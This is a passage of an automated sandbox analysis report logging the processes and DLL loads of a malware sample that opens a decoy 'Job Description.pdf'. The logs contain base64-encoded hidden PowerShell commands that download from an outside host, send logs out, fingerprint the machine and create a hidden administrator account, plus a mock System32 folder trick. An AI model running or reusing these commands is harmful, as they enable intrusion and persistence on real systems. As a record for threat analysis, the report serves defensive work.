GwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES421C.tmp" "c:\Users\user\AppData\Local\Temp\pkwqtvat\CSC14ED126C80BF4A239EEB93A187C6F14.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf"Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1720,i,11727097951679054640,6860338187584795454,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
